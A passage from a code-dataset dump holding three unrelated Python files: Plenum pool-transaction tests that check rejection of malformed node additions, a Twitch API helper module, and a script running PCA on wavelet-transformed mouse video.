testStewardCannotAddNodeWithNonBase58VerKey(looper, tdir,\n txnPoolNodeSet,\n newAdHocSteward):\n \"\"\"\n The Case:\n Steward accidentally sends the NODE txn with a non base58 verkey.\n The expected result:\n Steward gets NAck response from the pool.\n \"\"\"\n # create a new steward\n newSteward, newStewardWallet = newAdHocSteward\n\n newNodeName = \"Epsilon\"\n\n # get hex VerKey\n sigseed = randomString(32).encode()\n nodeSigner = SimpleSigner(seed=sigseed)\n b = base58.b58decode(nodeSigner.identifier)\n hexVerKey = bytearray(b).hex()\n\n def _setHexVerkey(op):\n op[TARGET_NYM] = hexVerKey\n return op\n\n sendAddNewNode(newNodeName, newSteward, newStewardWallet,\n transformOpFunc=_setHexVerkey)\n waitReqNackFromPoolWithReason(looper, txnPoolNodeSet, newSteward,\n 'is not a base58 string')\n\n\ndef testStewardCannotAddNodeWithInvalidHa(looper, tdir,\n txnPoolNodeSet,\n newAdHocSteward):\n \"\"\"\n The case:\n Steward accidentally sends the NODE txn with an invalid HA.\n The expected result:\n Steward gets NAck response from the pool.\n \"\"\"\n newNodeName = \"Epsilon\"\n\n newSteward, newStewardWallet = newAdHocSteward\n\n # a sequence of the test cases for each field\n tests = itertools.chain(\n itertools.product(\n (NODE_IP, CLIENT_IP), ('127.0.0.1 ', '256.0.0.1', '0.0.0.0')\n ),\n itertools.product(\n (NODE_PORT, CLIENT_PORT), ('foo', '9700', 0, 65535 + 1, 4351683546843518184)\n ),\n )\n\n for field, value in tests:\n # create a transform function for each test\n def _tnf(op): op[DATA].update({field: value})\n\n sendAddNewNode(newNodeName, newSteward, newStewardWallet,\n transformOpFunc=_tnf)\n # wait NAcks with exact message. it does not works for just 'is invalid'\n # because the 'is invalid' will check only first few cases\n waitReqNackFromPoolWithReason(looper, txnPoolNodeSet, newSteward,\n \"'{}' ('{}') is invalid\".format(field, value))\n\n\ndef testStewardCannotAddNodeWithOutFullFieldsSet(looper, tdir,\n txnPoolNodeSet,\n newAdHocSteward):\n \"\"\"\n The case:\n Steward accidentally sends the NODE txn without full fields set.\n The expected result:\n Steward gets NAck response from the pool.\n \"\"\"\n newNodeName = \"Epsilon\"\n\n newSteward, newStewardWallet = newAdHocSteward\n\n # case from the ticket\n def _renameNodePortField(op):\n op[DATA].update({NODE_PORT + ' ': op[DATA][NODE_PORT]})\n del op[DATA][NODE_PORT]\n\n sendAddNewNode(newNodeName, newSteward, newStewardWallet,\n transformOpFunc=_renameNodePortField)\n waitReqNackFromPoolWithReason(looper, txnPoolNodeSet, newSteward,\n \"unknown field\")\n\n for fn in (NODE_IP, CLIENT_IP, NODE_PORT, CLIENT_PORT):\n def _tnf(op): del op[DATA][fn]\n\n sendAddNewNode(newNodeName, newSteward, newStewardWallet,\n transformOpFunc=_tnf)\n # wait NAcks with exact message. it does not works for just 'is missed'\n # because the 'is missed' will check only first few cases\n waitReqNackFromPoolWithReason(looper, txnPoolNodeSet, newSteward,\n \"unknown field\")\n\n\ndef testStewardCannotAddMoreThanOneNode(looper, txnPoolNodeSet, steward1,\n stewardWallet, tdirWithPoolTxns, tconf,\n allPluginsPath):\n newNodeName = \"Epsilon\"\n sendAddNewNode(newNodeName, steward1, stewardWallet)\n\n for node in txnPoolNodeSet:\n waitRejectWithReason(looper, steward1,\n 'already has a node',\n node.clientstack.name)\n\n\ndef testNonStewardCannotAddNode(looper, txnPoolNodeSet, client1,\n wallet1, client1Connected, tdirWithPoolTxns,\n tconf, allPluginsPath):\n newNodeName = \"Epsilon\"\n sendAddNewNode(newNodeName, client1, wallet1)\n for node in txnPoolNodeSet:\n waitRejectWithReason(looper, client1, 'is not a steward so cannot add a '\n 'new node', node.clientstack.name)\n\n\ndef testClientConnectsToNewNode(looper, txnPoolNodeSet, tdirWithPoolTxns,\n tconf, steward1, stewardWallet, allPluginsPath):\n \"\"\"\n A client should be able to connect to a newly added node\n \"\"\"\n newStewardName = \"testClientSteward\" + randomString(3)\n newNodeName = \"Epsilon\"\n oldNodeReg = copy(steward1.nodeReg)\n newSteward, newStewardWallet, newNode = addNewStewardAndNode(looper,\n steward1, stewardWallet,\n newStewardName, newNodeName,\n tdirWithPoolTxns, tconf,\n allPluginsPath)\n txnPoolNodeSet.append(newNode)\n looper.run(checkNodesConnected(txnPoolNodeSet))\n logger.debug(\"{} connected to the pool\".format(newNode))\n\n def chkNodeRegRecvd():\n assert (len(steward1.nodeReg) - len(oldNodeReg)) == 1\n assert (newNode.name + CLIENT_STACK_SUFFIX) in steward1.nodeReg\n\n timeout = waits.expectedClientToPoolConnectionTimeout(len(txnPoolNodeSet))\n looper.run(eventually(chkNodeRegRecvd, retryWait=1, timeout=timeout))\n ensureClientConnectedToNodesAndPoolLedgerSame(looper, steward1,\n *txnPoolNodeSet)\n ensureClientConnectedToNodesAndPoolLedgerSame(looper, newSteward,\n *txnPoolNodeSet)\n\n\ndef testAdd2NewNodes(looper, txnPoolNodeSet, tdirWithPoolTxns, tconf, steward1,\n stewardWallet, allPluginsPath):\n \"\"\"\n Add 2 new nodes to trigger replica addition and primary election\n \"\"\"\n for nodeName in (\"Zeta\", \"Eta\"):\n newStewardName = \"testClientSteward\" + randomString(3)\n newSteward, newStewardWallet, newNode = addNewStewardAndNode(looper,\n steward1,\n stewardWallet,\n newStewardName,\n nodeName,\n tdirWithPoolTxns,\n tconf,\n allPluginsPath)\n txnPoolNodeSet.append(newNode)\n looper.run(checkNodesConnected(txnPoolNodeSet))\n logger.debug(\"{} connected to the pool\".format(newNode))\n waitNodeDataEquality(looper, newNode, *txnPoolNodeSet[:-1])\n\n f = getMaxFailures(len(txnPoolNodeSet))\n\n def checkFValue():\n for node in txnPoolNodeSet:\n assert node.f == f\n assert len(node.replicas) == (f + 1)\n\n timeout = waits.expectedClientToPoolConnectionTimeout(len(txnPoolNodeSet))\n looper.run(eventually(checkFValue, retryWait=1, timeout=timeout))\n checkProtocolInstanceSetup(looper, txnPoolNodeSet, retryWait=1)\n", "sub_path": "plenum/test/pool_transactions/test_nodes_with_pool_txns.py", "file_name": "test_nodes_with_pool_txns.py", "file_ext": "py", "file_size_in_byte": 9741, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "stp_core.common.log.getlogger", "line_number": 21, "usage_type": "call"}, {"api_name": "plenum.test.node_catchup.helper.ensureClientConnectedToNodesAndPoolLedgerSame", "line_number": 41, "usage_type": "call"}, {"api_name": "plenum.test.helper.sendReqsToNodesAndVerifySuffReplies", "line_number": 43, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.addNewClient", "line_number": 47, "usage_type": "call"}, {"api_name": "plenum.common.util.randomString", "line_number": 47, "usage_type": "call"}, {"api_name": "plenum.test.waits.expectedTransactionExecutionTime", "line_number": 53, "usage_type": "call"}, {"api_name": "plenum.test.waits", "line_number": 53, "usage_type": "name"}, {"api_name": "stp_core.loop.eventually.eventually", "line_number": 54, "usage_type": "call"}, {"api_name": "plenum.common.util.randomString", "line_number": 72, "usage_type": "call"}, {"api_name": "plenum.common.signer_simple.SimpleSigner", "line_number": 73, "usage_type": "call"}, {"api_name": "base58.b58decode", "line_number": 74, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 81, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitReqNackFromPoolWithReason", "line_number": 83, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 101, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 102, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 105, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 114, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitReqNackFromPoolWithReason", "line_number": 118, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 140, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitReqNackFromPoolWithReason", "line_number": 142, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 148, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitReqNackFromPoolWithReason", "line_number": 152, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 160, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitRejectWithReason", "line_number": 163, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 172, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitRejectWithReason", "line_number": 174, "usage_type": "call"}, {"api_name": "plenum.common.util.randomString", "line_number": 183, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 185, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.addNewStewardAndNode", "line_number": 186, "usage_type": "call"}, {"api_name": "plenum.test.test_node.checkNodesConnected", "line_number": 192, "usage_type": "call"}, {"api_name": "plenum.test.waits.expectedClientToPoolConnectionTimeout", "line_number": 199, "usage_type": "call"}, {"api_name": "plenum.test.waits", "line_number": 199, "usage_type": "name"}, {"api_name": "stp_core.loop.eventually.eventually", "line_number": 200, "usage_type": "call"}, {"api_name": "plenum.test.node_catchup.helper.ensureClientConnectedToNodesAndPoolLedgerSame", "line_number": 201, "usage_type": "call"}, {"api_name": "plenum.test.node_catchup.helper.ensureClientConnectedToNodesAndPoolLedgerSame", "line_number": 203, "usage_type": "call"}, {"api_name": "plenum.common.util.randomString", "line_number": 213, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.addNewStewardAndNode", "line_number": 214, "usage_type": "call"}, {"api_name": "plenum.test.test_node.checkNodesConnected", "line_number": 223, "usage_type": "call"}, {"api_name": "plenum.test.node_catchup.helper.waitNodeDataEquality", "line_number": 225, "usage_type": "call"}, {"api_name": "plenum.common.util.getMaxFailures", "line_number": 227, "usage_type": "call"}, {"api_name": "plenum.test.waits.expectedClientToPoolConnectionTimeout", "line_number": 234, "usage_type": "call"}, {"api_name": "plenum.test.waits", "line_number": 234, "usage_type": "name"}, {"api_name": "stp_core.loop.eventually.eventually", "line_number": 235, "usage_type": "call"}, {"api_name": "plenum.test.test_node.checkProtocolInstanceSetup", "line_number": 236, "usage_type": "call"}]} +{"seq_id": "596996987", "text": "import json\nimport random\nimport asyncio\nimport socket\nimport dateutil.parser\n\nimport common.http\nfrom common import utils\nfrom common.config import config\n\nGAME_CHECK_INTERVAL = 5*60\n\ndef get_info_uncached(username=None, use_fallback=True):\n\t\"\"\"\n\tGet the Twitch info for a particular user or channel.\n\n\tDefaults to the stream channel if not otherwise specified.\n\n\tFor response object structure, see:\n\thttps://github.com/justintv/Twitch-API/blob/master/v3_resources/channels.md#example-response\n\n\tMay throw exceptions on network/Twitch error.\n\t\"\"\"\n\tif username is None:\n\t\tusername = config['channel']\n\n\t# Attempt to get the channel data from /streams/channelname\n\t# If this succeeds, it means the channel is currently live\n\theaders = {\n\t\t'Client-ID': config['twitch_clientid'],\n\t}\n\tres = common.http.request(\"https://api.twitch.tv/kraken/streams/%s\" % username, headers=headers)\n\tdata = json.loads(res)\n\tchannel_data = data.get('stream') and data['stream'].get('channel')\n\tif channel_data:\n\t\tchannel_data['live'] = True\n\t\tchannel_data['viewers'] = data['stream'].get('viewers')\n\t\tchannel_data['stream_created_at'] = data['stream'].get('created_at')\n\t\treturn channel_data\n\n\tif not use_fallback:\n\t\treturn None\n\n\t# If that failed, it means the channel is offline\n\t# Ge the channel data from here instead\n\tres = common.http.request(\"https://api.twitch.tv/kraken/channels/%s\" % username, headers=headers)\n\tchannel_data = json.loads(res)\n\tchannel_data['live'] = False\n\treturn channel_data\n\n@utils.cache(GAME_CHECK_INTERVAL, params=[0, 1])\ndef get_info(username=None, use_fallback=True):\n\treturn get_info_uncached(username, use_fallback=use_fallback)\n\n@utils.cache(GAME_CHECK_INTERVAL, params=[0, 1])\ndef get_game(name, all=False):\n\t\"\"\"\n\tGet the game information for a particular game.\n\n\tFor response object structure, see:\n\thttps://github.com/justintv/Twitch-API/blob/master/v3_resources/search.md#example-response-1\n\n\tMay throw exceptions on network/Twitch error.\n\t\"\"\"\n\tsearch_opts = {\n\t\t'query': name,\n\t\t'type': 'suggest',\n\t\t'live': 'false',\n\t}\n\theaders = {\n\t\t'Client-ID': config['twitch_clientid'],\n\t}\n\tres = common.http.request(\"https://api.twitch.tv/kraken/search/games\", search_opts, headers=headers)\n\tres = json.loads(res)\n\tif all:\n\t\treturn res['games']\n\telse:\n\t\tfor game in res['games']:\n\t\t\tif game['name'] == name:\n\t\t\t\treturn game\n\t\treturn None\n\ndef get_game_playing(username=None):\n\t\"\"\"\n\tGet the game information for the game the stream is currently playing\n\t\"\"\"\n\tchannel_data = get_info(username, use_fallback=False)\n\tif not channel_data or not channel_data['live']:\n\t\treturn None\n\tif channel_data.get('game'):\n\t\treturn get_game(name=channel_data['game'])\n\treturn None\n\ndef is_stream_live(username=None):\n\t\"\"\"\n\tGet whether the stream is currently live\n\t\"\"\"\n\tchannel_data = get_info(username, use_fallback=False)\n\treturn channel_data and channel_data['live']\n\n@asyncio.coroutine\ndef get_subscribers(channel, token, count=5, offset=None, latest=True):\n\theaders = {\n\t\t\"Authorization\": \"OAuth %s\" % token,\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tdata = {\n\t\t\"limit\": str(count),\n\t\t\"direction\": \"desc\" if latest else \"asc\",\n\t}\n\tif offset is not None:\n\t\tdata['offset'] = str(offset)\n\tres = yield from common.http.request_coro(\"https://api.twitch.tv/kraken/channels/%s/subscriptions\" % channel, headers=headers, data=data)\n\tsubscriber_data = json.loads(res)\n\treturn [\n\t\t(sub['user']['display_name'], sub['user'].get('logo'), sub['created_at'], sub.get('updated_at', sub['created_at']))\n\t\tfor sub in subscriber_data['subscriptions']\n\t]\n\n@asyncio.coroutine\ndef get_follows_channels(username=None):\n\tif username is None:\n\t\tusername = config[\"username\"]\n\theaders = {\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\turl = \"https://api.twitch.tv/kraken/users/%s/follows/channels\" % username\n\tfollows = []\n\ttotal = 1\n\twhile len(follows) < total:\n\t\tdata = yield from common.http.request_coro(url, headers=headers)\n\t\tdata = json.loads(data)\n\t\ttotal = data[\"_total\"]\n\t\tfollows += data[\"follows\"]\n\t\turl = data[\"_links\"][\"next\"]\n\treturn follows\n\n@asyncio.coroutine\ndef get_streams_followed(token):\n\turl = \"https://api.twitch.tv/kraken/streams/followed\"\n\theaders = {\n\t\t\"Authorization\": \"OAuth %s\" % token,\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tstreams = []\n\ttotal = 1\n\twhile len(streams) < total:\n\t\tdata = yield from common.http.request_coro(url, headers=headers)\n\t\tdata = json.loads(data)\n\t\ttotal = data[\"_total\"]\n\t\tstreams += data[\"streams\"]\n\t\turl = data[\"_links\"][\"next\"]\n\treturn streams\n\n@asyncio.coroutine\ndef follow_channel(target, token):\n\theaders = {\n\t\t\"Authorization\": \"OAuth %s\" % token,\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tyield from common.http.request_coro(\"https://api.twitch.tv/kraken/users/%s/follows/channels/%s\" % (config[\"username\"], target),\n\t\t\t\t\t\t\t\t\t\tdata={\"notifications\": \"false\"}, method=\"PUT\", headers=headers)\n\n@asyncio.coroutine\ndef unfollow_channel(target, token):\n\theaders = {\n\t\t\"Authorization\": \"OAuth %s\" % token,\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tyield from common.http.request_coro(\"https://api.twitch.tv/kraken/users/%s/follows/channels/%s\" % (config[\"username\"], target),\n\t\t\t\t\t\t\t\t\t\tmethod=\"DELETE\", headers=headers)\n\n@asyncio.coroutine\ndef get_videos(channel=None, offset=0, limit=10, broadcasts=False, hls=False):\n\tchannel = channel or config[\"channel\"]\n\theaders = {\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tdata = yield from common.http.request_coro(\"https://api.twitch.tv/kraken/channels/%s/videos\" % channel, headers=headers, data={\n\t\t\"offset\": str(offset),\n\t\t\"limit\": str(limit),\n\t\t\"broadcasts\": \"true\" if broadcasts else \"false\",\n\t\t\"hls\": \"true\" if hls else \"false\",\n\t})\n\treturn json.loads(data)[\"videos\"]\n\ndef get_user(user):\n\theaders = {\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\treturn json.loads(common.http.request(\"https://api.twitch.tv/kraken/users/%s\" % user, headers=headers))\n\nclass get_followers:\n\tdef __init__(self, channel, limit=25, direction='desc'):\n\t\tself.next_url = \"https://api.twitch.tv/kraken/channels/%s/follows\" % channel\n\t\tself.params = {\n\t\t\t'limit': str(limit),\n\t\t\t'direction': direction,\n\t\t}\n\t\tself.headers = {\n\t\t\t'Client-ID': config['twitch_clientid'],\n\t\t}\n\t\tself.follows = []\n\n\tasync def __aiter__(self):\n\t\treturn self\n\n\tasync def __anext__(self):\n\t\twhile True:\n\t\t\tif self.follows:\n\t\t\t\treturn self.follows.pop(0)\n\n\t\t\tif self.next_url is None:\n\t\t\t\traise StopAsyncIteration\n\n\t\t\tdata = json.loads(await common.http.request_coro(self.next_url, data=self.params, headers=self.headers))\n\t\t\tself.params = {}\n\t\t\tself.next_url = data['_links'].get('next') if data.get('_cursor') else None\n\t\t\tfor follow in data['follows']:\n\t\t\t\tfollow['created_at'] = dateutil.parser.parse(follow['created_at'])\n\t\t\t\tself.follows.append(follow)\n", "sub_path": "common/twitch.py", "file_name": "twitch.py", "file_ext": "py", "file_size_in_byte": 6713, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "common.config.config", "line_number": 25, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 30, "usage_type": "name"}, {"api_name": "common.http.http.request", "line_number": 32, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 32, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 32, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 33, "usage_type": "call"}, {"api_name": "common.http.http.request", "line_number": 46, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 46, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 46, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}, {"api_name": "common.utils.cache", "line_number": 51, "usage_type": "call"}, {"api_name": "common.utils", "line_number": 51, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 71, "usage_type": "name"}, {"api_name": "common.http.http.request", "line_number": 73, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 73, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 73, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 74, "usage_type": "call"}, {"api_name": "common.utils.cache", "line_number": 55, "usage_type": "call"}, {"api_name": "common.utils", "line_number": 55, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 105, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 113, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 113, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 113, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 114, "usage_type": "call"}, {"api_name": "asyncio.coroutine", "line_number": 101, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 123, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 125, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 131, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 131, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 131, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 132, "usage_type": "call"}, {"api_name": "asyncio.coroutine", "line_number": 120, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 143, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 148, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 148, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 148, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 149, "usage_type": "call"}, {"api_name": "asyncio.coroutine", "line_number": 138, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 159, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 161, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 161, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 161, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 161, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 155, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 168, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 170, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 170, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 170, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 170, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 164, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 175, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 177, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 179, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 179, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 179, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 185, "usage_type": "call"}, {"api_name": "asyncio.coroutine", "line_number": 173, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 189, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 191, "usage_type": "call"}, {"api_name": "common.http.http.request", "line_number": 191, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 191, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 191, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 201, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 216, "usage_type": "call"}, {"api_name": "common.http.http.request_coro", "line_number": 216, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 216, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 216, "usage_type": "name"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 220, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 220, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 220, "usage_type": "name"}]} +{"seq_id": "31208849", "text": "'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n\n----------- Perform PCA on wavelet-transformed mouse video -------------------------\n\n\n'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n\nimport numpy as np; import cv2; import sklearn.decomposition; import os; import warnings; \nfrom learning_funcs import reconstruct_from_wavelet; from sklearn.externals import joblib; import glob\nwarnings.filterwarnings('once')\n\n''' -------------------------------------------------------------------------------------------------------------------------------------\n#------------------------ Select data file and analysis parameters --------------------------------------\n#--------------------------------------------------------------------------------------------------------------------------------------'''\n\n\n# ------------------------------------------\n# Select data file name and folder location\n# ------------------------------------------\nsave_folder_location = \"C:\\\\Drive\\\\Video Analysis\\\\data\\\\3D_pipeline\\\\\"\n\nsession_name_tags = ['session1']\ntwoD = True\n\ndata_library_name_tag = 'test2D'\n\n\n\n\nexamine_PCA_reconstruction = True\nexamine_PCA_reconstruction_cumulatively = True\ndo_not_overwrite = True\n\n# ---------------------------\n# Select analysis parameters\n# ---------------------------\nnum_PCs_to_create = 10\n\nfeature_relevance_threshold = 0.01\nmodify_relevant_features_from_previous_runs = True\ndisplay_frame_rate = 40\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''-------------------------------------------------------------------------------------------------------------------------------------\n#----------------------- Prepare wavelet transformed data -----------------------------------\n#------------------------------------------------------------------------------------------------------------------------------------'''\n\n\n\n# -----------------------------------------------\n# Find data library folder and sessions name tags\n# -----------------------------------------------\nfolder_location_data_library = save_folder_location + data_library_name_tag + '\\\\'\nif not os.path.isdir(folder_location_data_library):\n os.makedirs(folder_location_data_library)\nfile_location_data_library = folder_location_data_library + data_library_name_tag\nprint(\"saving to \" + folder_location_data_library)\nif twoD:\n twoD_suffix = '2D'\nelse:\n twoD_suffix = ''\n\n\n\n# ----------------------------------------------------------------------------------------------------------\n# Initialize huge array of wavelet features from all videos, plus the indices of important wavelet features\n# ----------------------------------------------------------------------------------------------------------\ncoeff_slices = np.load(save_folder_location + 'wavelet_slices.npy')\n\nprint('preparing features...')\nif not modify_relevant_features_from_previous_runs and os.path.isfile(file_location_data_library + '_relevant_wavelet_features_PCA' + twoD_suffix + '.npy'):\n relevant_wavelet_features = np.load(file_location_data_library + '_relevant_wavelet_features_PCA' + twoD_suffix + '.npy')\n new_relevant_wavelet_features = False\nelse:\n relevant_wavelet_features = np.ones(39*39).astype(bool)\n new_relevant_wavelet_features = True\n print('and calculating relevant features...')\n \n \n\n# ------------------------------------------------------------------------\n# for each session, add the wavelet features to the huge array of features\n# ------------------------------------------------------------------------\nwavelet_array_all_sessions = np.zeros((1, len(relevant_wavelet_features)))\nwavelet_feature_std_all_sessions = np.zeros(39 * 39)\nsession_index = []\n\nfor session in enumerate(session_name_tags):\n print(session[1])\n file_locations_saved_data = glob.glob(save_folder_location + session[1] + '\\\\' + '*wavelet' + twoD_suffix + '.npy')\n if len(file_locations_saved_data)==0:\n raise Exception('wavelet data not found')\n wavelet_array_session = np.zeros((1, len(relevant_wavelet_features)))\n # do so for every video\n for wavelet_video in enumerate(file_locations_saved_data):\n if wavelet_video[1].find('upside') > 0: # skip upside-down data\n continue\n wavelet_array = np.load(wavelet_video[1]) # .astype(np.float64)\n wavelet_array = np.reshape(wavelet_array, (39 * 39, wavelet_array.shape[2]))\n wavelet_array_session = np.concatenate((wavelet_array_session, wavelet_array[relevant_wavelet_features, :].T))\n wavelet_array_session = wavelet_array_session[1:,:]\n wavelet_array_all_sessions = np.concatenate((wavelet_array_all_sessions, wavelet_array_session))\nwavelet_array_all_sessions = wavelet_array_all_sessions[1:, :]\n\n\n\n# -------------------------------------------------------------------\n# Find the features that vary across time and are therefore relevant\n# -------------------------------------------------------------------\nif new_relevant_wavelet_features:\n relevant_wavelet_features = (np.std(wavelet_array_all_sessions, axis=0) > feature_relevance_threshold)\n # also save the index of each of these features\n relevant_wavelet_features = np.where(relevant_wavelet_features)[0]\n np.save(file_location_data_library + '_relevant_wavelet_features_PCA' + twoD_suffix + '.npy', relevant_wavelet_features) \n wavelet_array_all_sessions = wavelet_array_all_sessions[:, relevant_wavelet_features]\nprint(str(len(relevant_wavelet_features)) + ' relevant features retained from wavelet transform')\n\nwavelet_relevant_mean = np.mean(wavelet_array_all_sessions, axis=0)\nlevel = 5 # how many different spatial scales are used in wavelet transform\ndiscard_scale = 4\n\n\n''' -------------------------------------------------------------------------------------------------------------------------------------\n#----------------------- Examine each PC -----------------------------------\n#--------------------------------------------------------------------------------------------------------------------------------------''' \n\nif examine_PCA_reconstruction:\n \n # ------------------------------------------\n # Generate the PCs for the wavelet features\n # ------------------------------------------\n print('fitting pca...')\n pca = sklearn.decomposition.PCA(n_components=num_PCs_to_create, svd_solver ='arpack') #if too slow, try svd_solver = 'randomized'\n pca.fit(wavelet_array_all_sessions) # input: (samples, features)\n\n # for each PC:\n for n_com in range(0, num_PCs_to_create):\n # -----------------------------------\n # Compute the expansion coefficients\n # ----------------------------------- \n if examine_PCA_reconstruction_cumulatively: # Reconstruct the data based on all the PCs taken so far\n coeffs = np.zeros((num_PCs_to_create,600))\n coeffs[0:n_com + 1,:] = pca.transform(wavelet_array_all_sessions).T[0:n_com + 1, 0:600]\n wavelet_array_relevant_features_recon = pca.inverse_transform(coeffs.T)\n else: # Reconstruct the data based on only the current PC\n coeffs = pca.transform(wavelet_array_all_sessions).T[n_com:n_com + 1, 0:600]\n wavelet_array_relevant_features_recon = (pca.components_[n_com:n_com+1].T@coeffs).astype(float).T + wavelet_relevant_mean\n \n # -----------------------------------\n # Report PC performance\n # ----------------------------------- \n print('principal component ' + str(n_com+1)) \n print(str((100*pca.explained_variance_ratio_[n_com])) + '% var explained by this PC')\n print(str((100*sum(pca.explained_variance_ratio_[0:n_com+1]))) + '% var explained total'); print('')\n \n # ------------------------------------\n # Display PC resonstruction over time\n # ------------------------------------ \n empty_wavelet = np.zeros(39*39)\n if n_com == 0 or n_com == 9:\n num_to_see = 500\n else:\n num_to_see = 300\n for frame_num in range(num_to_see):\n empty_wavelet[relevant_wavelet_features] = wavelet_array_relevant_features_recon[frame_num,:]\n wavelet = np.reshape(empty_wavelet,(39,39))\n #reconstruct image from wavelet transform\n reconstruction_from_wavelet = reconstruct_from_wavelet(wavelet, coeff_slices, level, discard_scale)\n reconstruction_from_wavelet[reconstruction_from_wavelet > 255] = 255\n reconstruction_from_wavelet = cv2.resize(abs(reconstruction_from_wavelet).astype(np.uint8),(450,450))\n cv2.imshow('PC / wavelet reconstruction', reconstruction_from_wavelet)\n \n if cv2.waitKey(int(1000/display_frame_rate)) & 0xFF == ord('q'):\n break\n \n if cv2.waitKey(500) & 0xFF == ord('q'):\n break\n \n \n''' -------------------------------------------------------------------------------------------------------------------------------------\n#----------------------- Save PCs -----------------------------------\n#--------------------------------------------------------------------------------------------------------------------------------------'''\n\n\n\n# Generate the PCs for the wavelet features\nprint('saving pca model...')\npca = sklearn.decomposition.PCA(n_components=num_PCs_to_create, svd_solver ='arpack') #if too slow, try svd_solver = 'randomized'\npca.fit(wavelet_array_all_sessions) # input: (samples, features)\n\nif os.path.isfile(folder_location_data_library + '_pca') and do_not_overwrite:\n raise Exception('File already exists') \njoblib.dump(pca, file_location_data_library + '_pca' + twoD_suffix)\n\nfor session in 